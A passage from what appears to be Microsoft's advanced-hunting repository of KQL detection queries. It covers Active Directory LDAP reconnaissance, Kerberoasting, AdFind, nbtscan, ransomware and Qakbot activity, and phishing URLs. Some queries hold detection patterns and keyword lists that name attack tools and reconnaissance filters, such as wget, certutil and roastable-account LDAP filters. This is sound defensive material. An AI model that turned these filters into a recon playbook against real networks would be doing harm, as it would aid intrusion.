ozSoprin ================================================ FILE: Discovery/PasswordSearch.md ================================================ # Detect LDAP queries that search for user password in description or comment Detect Active Directory LDAP queries that search for users with comment or description that contains the string "pass" that might suggest for the user password This LDAP query cover MetaSploit - enum_ad_user_comments tool ## Query ``` let PersonObject = "objectCategory=person"; let UserClass = "objectClass=user"; let SamAccountUser = "samAccountType=805306368"; let Description = "description=*pass*"; let Comment = "comment=*pass*"; IdentityQueryEvents | where ActionType == "LDAP query" | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter | where (SearchFilter contains Description or SearchFilter contains Comment) and (SearchFilter contains PersonObject or SearchFilter contains UserClass or SearchFilter contains SamAccountUser) ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | X | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributors info **Contributor:** Mor Rubin **GitHub alias:** https://github.com/morRubin **Organization:** Microsoft **Contact info:** Twitter: MorRubin **Contributor:** Oz Soprin **GitHub alias:** https://github.com/ozSoprin **Organization:** Microsoft **Contact info:** Twitter: ozSoprin ================================================ FILE: Discovery/PrevalentInteractiveLogons ================================================ // Breaks down the top interactive logged on user for each machine. // you can look for a specific user by using the line in comment of where AccountName DeviceLogonEvents //| where AccountName == "YOUR ACCOUNT" | where LogonType in ("Interactive","CachedInteractive") and ActionType == "LogonSuccess" | extend parsed = parse_json(AdditionalFields) | extend Localcheck = tostring(parsed.IsLocalLogon) | where Localcheck notcontains "false" | summarize timesloggedon=count() by DeviceName, AccountName | summarize arg_max(timesloggedon,*) by DeviceName ================================================ FILE: Discovery/Roasting.md ================================================ # Detect LDAP queries that search for accounts vulnerable for roasting attacks Detect Active Directory LDAP queries that search for Kerberoasting (SPNs) or accounts with Kerberos preauthentication not required from Azure ATP, and try to get the process initiated the LDAP query from MDATP. Replace 389 on line 5 with LDAP port in your environment Replace true on line 6 to false if you want to include Nt Authority process This LDAP query cover Rubeus, Kerberoast, BloodHound tools ## Query ``` let ASREP_ROASTING = "userAccountControl:1.2.840.113556.1.4.803:=4194304"; let ASREP_ROASTING1 = "userAccountControl|4194304"; let ASREP_ROASTING2 = "userAccountControl&4194304"; let KERBEROASTING = "serviceprincipalname=*"; let LDAP_PORT = 389; let ExcludeNtAuthorityProcess = true; let AzureAtpLdap = ( IdentityQueryEvents | where ActionType == "LDAP query" | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter | where SearchFilter contains ASREP_ROASTING or SearchFilter contains ASREP_ROASTING1 or SearchFilter contains ASREP_ROASTING2 or SearchFilter contains KERBEROASTING | extend Time = bin(Timestamp, 1s) | extend DeviceNameWithoutDomain = tolower(tostring(split(DeviceName, '.')[0]))); let MDAtpNetworkToProcess = ( DeviceNetworkEvents | extend DeviceNameWithoutDomain = tolower(tostring(split(DeviceName, '.')[0])) | where RemotePort == LDAP_PORT | extend Time = bin(Timestamp, 1s) | extend isExclude = iff( ExcludeNtAuthorityProcess and InitiatingProcessAccountDomain == "nt authority" , true, false)); AzureAtpLdap | join kind=leftouter ( MDAtpNetworkToProcess ) on DeviceNameWithoutDomain, Time | where isExclude == false or isnull(isExclude) ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | X | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributors info **Contributor:** Mor Rubin **GitHub alias:** https://github.com/morRubin **Organization:** Microsoft **Contact info:** Twitter: MorRubin **Contributor:** Oz Soprin **GitHub alias:** https://github.com/ozSoprin **Organization:** Microsoft **Contact info:** Twitter: ozSoprin ================================================ FILE: Discovery/SMB shares discovery.txt ================================================ // Query for processes that accessed more than 10 IP addresses over port 445 (SMB) - possibly scanning for network shares. // To read more about Network Share Discovery, see: https://attack.mitre.org/wiki/Technique/T1135 // Tags: #SMB, #NetworkScanning, #UniqueProcessId DeviceNetworkEvents | where RemotePort == 445 and Timestamp > ago(7d) // Exclude Kernel processes, as they are too noisy in this query and InitiatingProcessId !in (0, 4) | summarize RemoteIPCount=dcount(RemoteIP) by DeviceName, InitiatingProcessFileName, InitiatingProcessId, InitiatingProcessCreationTime | where RemoteIPCount > 10 // Implementation comment: // Process IDs are recycled and reused, so are not a unique identifier for a process. // For this reason we use a combination of ProcessId and ProcessCreationTime together with the DeviceName or DeviceId. // Read more here: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/advanced-hunting-best-practices-windows-defender-advanced-threat-protection ================================================ FILE: Discovery/SensitiveLdaps.md ================================================ # Detect LDAP queries for sensitive objects Detect Active Directory LDAP queries that search for sensitive objects in the organization This LDAP query cover BloodHound tool ## Query ``` let SensitiveObjects = "[\"Administrators\", \"Domain Controllers\", \"Domain Admins\", \"Account Operators\", \"Backup Operators\", \"DnsAdmin\", \"Enterprise Admins\", \"Group Policy Creator Owners\"]"; IdentityQueryEvents | where ActionType == "LDAP query" | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter | where SensitiveObjects contains QueryTarget or SearchFilter contains "admincount=1" ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | X | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributors info **Contributor:** Mor Rubin **GitHub alias:** https://github.com/morRubin **Organization:** Microsoft **Contact info:** Twitter: MorRubin **Contributor:** Oz Soprin **GitHub alias:** https://github.com/ozSoprin **Organization:** Microsoft **Contact info:** Twitter: ozSoprin ================================================ FILE: Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md ================================================ # Suspicious enumeration using Adfind tool Attackers can use Adfind which is administrative tool to gather information about domain controllers or ADFS servers. They may also rename executables with other benign tools on the system. The below query will look for Adfind usage in command line arguments irrespective of executable name in short span of time. You can limit query this to your DC and ADFS servers. Below references talk about suspicious use of adfind by adversaries. - [AdFind Recon](https://thedfirreport.com/2020/05/08/adfind-recon/) - [Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents](https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html) - [Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/) This query is inspired by a Azure Sentinel [detection](https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/Suspicious_enumeration_using_adfind.yaml). ## Query ```Kusto let startdate = 10d; let lookupwindow = 2m; let threshold = 3; //number of commandlines in the set below let DCADFSServersList = dynamic (["DCServer01", "DCServer02", "ADFSServer01"]); // Enter a reference list of hostnames for your DC/ADFS servers let tokens = dynamic(["objectcategory","domainlist","dcmodes","adinfo","trustdmp","computers_pwdnotreqd","Domain Admins", "objectcategory=person", "objectcategory=computer", "objectcategory=*"]); DeviceProcessEvents | where Timestamp between (ago(startdate) .. now()) //| where DeviceName in (DCADFSServersList) // Uncomment to limit it to your DC/ADFS servers list if specified above or any pattern in hostnames (startswith, matches regex, etc). | where ProcessCommandLine has_any (tokens) | where ProcessCommandLine matches regex "(.*)>(.*)" | summarize Commandlines = make_set(ProcessCommandLine), LastObserved=max(Timestamp) by bin(Timestamp, lookupwindow), AccountName, DeviceName, InitiatingProcessFileName, FileName | extend Count = array_length(Commandlines) | where Count > threshold ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | V | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | V | | | Lateral movement | | | | Collection | V | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also ## See also - [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md) - [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md) - [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md) - [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md) - [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md) - [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md) - [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md) - [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md) - [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md) - [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md) - [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md) - [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) - [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) - [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) - [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) - [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) - [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) - [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) - [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) - [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) - [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) - [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) - [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) - [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) - [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) - [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Stefan Sellmer **GitHub alias:** @stesell **Organization:** Microsoft 365 Defender **Contact info:** stesell@microsoft.com ================================================ FILE: Discovery/URL Detection.txt ================================================ // This query finds network communication to specific URL // Please note that in line #7 it filters RemoteUrl using has operator, which looks for a "whole term" and runs faster. // Example: RemoteUrl has "microsoft" matches "www.microsoft.com" but not "microsoftonline.com" let partialRemoteUrlToDetect = "microsoft.com"; // Change this to a URL you'd like to find machines connecting to DeviceNetworkEvents | where Timestamp > ago(7d) and RemoteUrl has partialRemoteUrlToDetect // Can be changed to "contains" operator as explained above | project Timestamp, DeviceName, DeviceId, ReportId | top 100 by Timestamp desc ================================================ FILE: Discovery/VulnComputers.md ================================================ # Detect LDAP queries that search for computer operating system Detect Active Directory LDAP queries that try to find operating systems that are vulnerable to specific vulnerabilities This LDAP query cover MetaSploit - enum_ad_computers tool ## Query ``` let ComputerObject = "objectCategory=computer"; let ComputerClass = "objectClass=computer"; let SamAccountComputer = "sAMAccountType=805306369"; let OperatingSystem = "operatingSystem="; IdentityQueryEvents | where ActionType == "LDAP query" | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter | where (SearchFilter contains ComputerObject or SearchFilter contains ComputerClass or SearchFilter contains SamAccountComputer) and SearchFilter contains OperatingSystem ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | X | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributors info **Contributor:** Mor Rubin **GitHub alias:** https://github.com/morRubin **Organization:** Microsoft **Contact info:** Twitter: MorRubin **Contributor:** Oz Soprin **GitHub alias:** https://github.com/ozSoprin **Organization:** Microsoft **Contact info:** Twitter: ozSoprin ================================================ FILE: Discovery/detect-nbtscan-activity.md ================================================ # Detect nbtscan activity This query was originally published in the threat analytics report, *Operation Soft Cell*. [Operation Soft Cell](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) is a series of campaigns targeting users' call logs at telecommunications providers throughout the world. These attacks date from as early as 2012. Operation Soft Cell operators have been known to run *[nbtscan.exe](https://unixwiz.net/tools/nbtscan.html)*, a legitimate MS-DOS command-line tool used to discover any NETBIOS nameservers on a local or remote TCP/IP network. The following query detects any nbtscan activity on the system over the past seven days. ## Query ```Kusto let nbtscan = pack_array("9af0cb61580dba0e380cddfe9ca43a3e128ed2f8", "90da10004c8f6fafdaa2cf18922670a745564f45"); union DeviceProcessEvents , DeviceFileEvents | where Timestamp > ago(7d) | where FileName =~ "nbtscan.exe" or SHA1 in (nbtscan) | project FolderPath, FileName, InitiatingProcessAccountName, InitiatingProcessFileName, ProcessCommandLine, Timestamp ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | The nbtscan tool is also incorporated in legitimate software packages not associated with Operation Soft Cell, to generate network inventories. After running this query, admins should investigate further to determine if the activity is suspicious. | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Discovery/detect-suspicious-commands-initiated-by-web-server-processes.md ================================================ # Detect suspicious commands initiated by web server processes This query was originally published in the threat analytics report, *Operation Soft Cell*. [Operation Soft Cell](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) is a series of campaigns targeting users' call logs at telecommunications providers throughout the world. These attacks date from as early as 2012. Operation Soft Cell operators sometimes use legitimate web server processes to launch commands, especially for network discovery and user/owner discovery. The following query detects activity of this kind. ## Query ```Kusto // Suspicious commands launched by web server processes DeviceProcessEvents | where Timestamp > ago(7d) // Pivoting on parents or grand parents and (((InitiatingProcessParentFileName in("w3wp.exe", "beasvc.exe", "httpd.exe") or InitiatingProcessParentFileName startswith "tomcat") or InitiatingProcessFileName in("w3wp.exe", "beasvc.exe", "httpd.exe") or InitiatingProcessFileName startswith "tomcat")) and FileName in~('cmd.exe','powershell.exe') | where ProcessCommandLine contains '%temp%' or ProcessCommandLine has 'wget' or ProcessCommandLine has 'whoami' or ProcessCommandLine has 'certutil' or ProcessCommandLine has 'systeminfo' or ProcessCommandLine has 'ping' or ProcessCommandLine has 'ipconfig' or ProcessCommandLine has 'timeout' | summarize any(Timestamp), any(Timestamp), any(FileName), makeset(ProcessCommandLine), any(InitiatingProcessFileName), any(InitiatingProcessParentFileName) by DeviceId ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | This query detects whenever, over the past seven days, a web server process launched a CLI command. This sort of activity, although suspicious, is not by itself actively harmful. Administrators should investigate further to determine if the event was malicious or associated with Operation Soft Cell. | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Discovery/doppelpaymer.md ================================================ # Detect DoppelPaymer performing reconnaissance with net.exe This query was originally published in the threat analytics report, *Doppelpaymer: More human-operated ransomware*. There is also a related [blog](https://msrc-blog.microsoft.com/2019/11/20/customer-guidance-for-the-dopplepaymer-ransomware/). [DoppelPaymer](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoppelPaymer!MTB&threatId=-2147205372) is ransomware that is spread manually by human operators. These operators have exhibited extensive knowledge of system administration and common network security misconfigurations. For example, they may use *net.exe* to run reconnaissance and find service accounts to target. They often use stolen credentials from over-privileged service accounts to turn off security software, run malicious commands, and spread malware throughout an organization. The following query detects the *net.exe* reconnaissance method described above. The [See also](#See-also) section below lists links to other queries associated with DoppelPaymer. ## Query ```Kusto // Finds Net commands used to locate high-value accounts DeviceProcessEvents | where Timestamp > ago(7d) | where FileName == "net.exe" // Create a set for the command lines | summarize makeset(ProcessCommandLine) by DeviceId, bin(Timestamp, 5m) // Other process launches by Net in that same timeframe | where (set_ProcessCommandLine has "admin" and set_ProcessCommandLine has_any("domain", "enterprise", "backup operators")) and set_ProcessCommandLine has "group" and set_ProcessCommandLine contains "/do" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | | | Lateral movement | v | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Detect DoppelPaymer operators spreading files with PsExec](../Lateral%20Movement/doppelpaymer-psexec.md) * [Detect DoppelPaymer operators stopping services](../Defense%20evasion/doppelpaymer-stop-services.md) * [Detect DoppelPaymer operators dumping credentials with ProcDump](../Credential%20Access/doppelpaymer-procdump.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Discovery/qakbot-campaign-esentutl.md ================================================ # Browser cookie theft by campaigns using Qakbot malware This query was originally published in the threat analytics report, *Qakbot blight lingers, seeds ransomware* [Qakbot](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/) is malware that steals login credentials from banking and financial services. It has been deployed against small businesses as well as major corporations. Some outbreaks have involved targeted ransomware campaigns that use a similar set of techniques. Links to related queries are listed under [See also](#See-also). The following query detects possible use of the system process, *esentutl.exe*, to look through a user's browser history and steal cookies. ## Query ```Kusto DeviceProcessEvents | where FileName == "esentutl.exe" | where ProcessCommandLine has "WebCache" | where ProcessCommandLine has_any ("V01", "/s", "/d") | project ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Self-deletion by Qakbot malware](..\Defense evasion\qakbot-campaign-self-deletion.md) * [Process injection by Qakbot malware](..\Defense evasion\qakbot-campaign-process-injection.md) * [Registry edits by campaigns using Qakbot malware](..\Persistence\qakbot-campaign-registry-edit.md) * [Outlook email access by campaigns using Qakbot malware](..\Discovery\qakbot-campaign-outlook.md) * [Javascript use by Qakbot malware](..\Execution\qakbot-campaign-suspicious-javascript.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Discovery/qakbot-campaign-outlook.md ================================================ # Outlook email access by campaigns using Qakbot malware This query was originally published in the threat analytics report, *Qakbot blight lingers, seeds ransomware* [Qakbot](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/) is malware that steals login credentials from banking and financial services. It has been deployed against small businesses as well as major corporations. Some outbreaks have involved targeted ransomware campaigns that use a similar set of techniques. Links to related queries are listed under [See also](#See-also). The following query detects attempts to access files in the local path that contain Outlook emails. ## Query ```Kusto DeviceFileEvents | where FolderPath hasprefix "EmailStorage" | where FolderPath has "Outlook" | project FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, DeviceId, Timestamp ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Self-deletion by Qakbot malware](..\Defense evasion\qakbot-campaign-self-deletion.md) * [Process injection by Qakbot malware](..\Defense evasion\qakbot-campaign-process-injection.md) * [Registry edits by campaigns using Qakbot malware](..\Persistence\qakbot-campaign-registry-edit.md) * [Browser cookie theft by campaigns using Qakbot malware](..\Discovery\qakbot-campaign-esentutl.md) * [Javascript use by Qakbot malware](..\Execution\qakbot-campaign-suspicious-javascript.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Email Queries/Appspot Phishing Abuse.md ================================================ # Appspot Phishing Abuse This query helps surface phishing campaigns associated with Appspot abuse. These emails frequently contain phishing links that utilize the recipients' own email address as a unique identifier in the URI. This campaign was published on Twitter by [@MsftSecIntel](https://twitter.com/MsftSecIntel) at this link: https://twitter.com/MsftSecIntel/status/1374148156301004800 ## Query ``` EmailUrlInfo // Detect URLs with a subdomain on appspot.com | where UrlDomain matches regex @'\b[\w\-]+-dot-[\w\-\.]+\.appspot\.com\b' // Enrich results with sender and recipient data | join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId // Phishing attempts from Appspot related campaigns typically contain the recipient's email address in the URI // Example 1: https://example-dot-example.appspot.com/#recipient@domain.com // Example 2: https://example-dot-example.appspot.com/index.html?user=recipient@domain.com | where Url has RecipientEmailAddress // Some phishing campaigns pass recipient email as a Base64 encoded string in the URI or Url has base64_encode_tostring(RecipientEmailAddress) | project-away Timestamp1, NetworkMessageId1, ReportId1 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | Credential phishing | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Email Queries/JNLP-File-Attachment.md ================================================ ## JNLP File Attachments JNLP file extensions are an uncommon file type often used to deliver malware. ## Query This query looks for email attachment name ending with a JNLP file extension. ``` EmailAttachmentInfo | where FileName endswith ".jnlp" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Email Queries/PhishingEmailUrlRedirector.md ================================================ # Phishing email URL redirection This query was originally published on Twitter, by [@MsftSecIntel](https://twitter.com/MsftSecIntel). The query helps detect emails associated with the open redirector URL campaign. The campaign's URLs begin with the distinct pattern, hxxps://t[.]domain[.]tld/r/?. Attackers use URL redirection to manipulate users into visiting a malicious website or to evade detection. ## Query Generic regex for all emails containing base "t-dot" redirector pattern: ``` EmailUrlInfo | where Url matches regex @"s?\:\/\/(?:www\.)?t\.(?:[\w\-\.]+\/+)+(?:r|redirect)\/?\?" ``` Specific regex for campaigns containing known malicious infrastructure as observed from late 2020 until at least April 2021: ``` EmailUrlInfo //This regex identifies emails containing the "T-Dot" redirector pattern in the URL | where Url matches regex @"s?\:\/\/(?:www\.)?t\.(?:[\w\-\.]+\/+)+(?:r|redirect)\/?\?" //This regex narrows in on emails that contain the known malicious domain pattern in the URL from the most recent campaigns and Url matches regex @"[a-zA-Z]\-[a-zA-Z]{2}\.(xyz|club|shop)" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Email Queries/referral-phish-emails.md ================================================ # Referral infrastructure credential phishing emails The "Referral" infrastructure is a point-in-time set of infrastructure associated with spoofed emails that imitate SharePoint and other legitimate products to conduct credential phishing. The operator is also known to use legitimate URL infrastructure such as Google, Microsoft, and Digital Ocean to host their phishing pages. ## Query Use this query to search for instances of malicious senders associated with multiple phishing campaigns for a few months in 2021, with subjects approximately similar to "Referral". These mails also attempt to bypass protections and access inboxes by spoofing the recipient domain in the displayed email address. This query will match instances where the displayed email address matches the recipient's domain and join to the email URL data for easy hunting on potential malicious credential theft sites. ``` let EmailAddresses = pack_array ('zreffertalt.com.com','zreffesral.com.com','kzreffertal.com.com', 'wzreffertal.com.com','refferal.comq','refferal.net','zreffertal.com.com', 'zrefferal.com.com','refferasl.com.com','zreffesral.com','zrefsfertal.com.com', 'irefferal.com','refferasl.co','zrefferal.com'); EmailEvents | where SenderMailFromDomain in (EmailAddresses) | extend RecipientDomain = extract("[^@]+$", 0, RecipientEmailAddress) | where SenderFromDomain == RecipientDomain | join EmailUrlInfo on $left.NetworkMessageId == $right.NetworkMessageId ``` ## Category Use this query to detect the following attack techniques and tactics (see MITRE ATT&CK framework) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Execution/Base64 Detector and Decoder.md ================================================ # Base64 Detector and Decoder This query will identify strings in process command lines which match Base64 encoding format, extract the string to a column called Base64, and decode it in a column called DecodedString. ## Query ``` DeviceProcessEvents | extend SplitLaunchString = split(ProcessCommandLine, " ") | mvexpand SplitLaunchString | where SplitLaunchString matches regex "^[A-Za-z0-9+/]{50,}[=]{0,2}$" | extend Base64 = tostring(SplitLaunchString) | extend DecodedString = base64_decodestring(Base64) | where isnotempty(DecodedString) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: 